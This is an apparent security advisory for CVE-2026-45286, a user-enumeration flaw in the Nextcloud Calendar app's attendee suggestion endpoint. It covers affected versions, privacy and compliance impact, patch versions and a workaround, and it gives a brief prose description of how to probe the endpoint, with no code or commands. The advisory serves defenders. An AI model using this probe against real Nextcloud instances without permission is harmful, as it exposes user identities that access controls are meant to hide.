Executive Summary

CVE-2026-45286 is a vulnerability in the Nextcloud Calendar app affecting versions 5.5.13 to before 5.5.17 and 6.2.0 to before 6.2.3. An authenticated user can exploit the attendee suggestion endpoint to enumerate other users on the same Nextcloud instance. This happens because the sharing restrictions that normally apply to other endpoints do not work properly on this endpoint, allowing unauthorized access to user information.

The vulnerability allows users to bypass privacy controls and see individuals from other groups they should not have access to, due to the autocomplete feature displaying all users regardless of group restrictions or Share-API settings.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability primarily impacts the confidentiality of user information within a Nextcloud instance. An attacker with authenticated access can enumerate and discover user identities that should be hidden due to group or sharing restrictions.

This exposure of sensitive user identifiers can lead to privacy violations and unauthorized disclosure of user data. It may also undermine trust in the platform's ability to enforce access controls and protect user privacy.

Useful 0 Not Useful 0

Compliance Impact

This vulnerability poses a significant data protection risk by allowing unauthorized access to user information that should be restricted. Such unauthorized disclosure of personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require strict controls over access to personal and sensitive information.

Because the vulnerability bypasses sharing and privacy settings, it undermines the principle of data minimization and confidentiality mandated by these regulations, potentially resulting in legal and regulatory consequences for affected organizations.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by testing the Calendar app's attendee suggestion endpoint to see if it allows an authenticated user to enumerate other users on the same Nextcloud instance, bypassing sharing restrictions.

A practical approach is to authenticate as a regular user and attempt to use the Calendar app's autocomplete or attendee suggestion feature to list users beyond your permitted groups or sharing scope.

Specific commands are not provided in the available resources, but you can use tools like curl or Postman to send authenticated requests to the Calendar app's attendee suggestion endpoint and observe if user enumeration is possible.

Useful 0 Not Useful 0

Mitigation Strategies

The primary mitigation step is to upgrade the Nextcloud Calendar app to version 5.5.17 or 6.2.3 or later, where the vulnerability has been patched.

If upgrading immediately is not possible, a recommended workaround is to disable the Calendar app to prevent exploitation of the user enumeration vulnerability.

Useful 0 Not Useful 0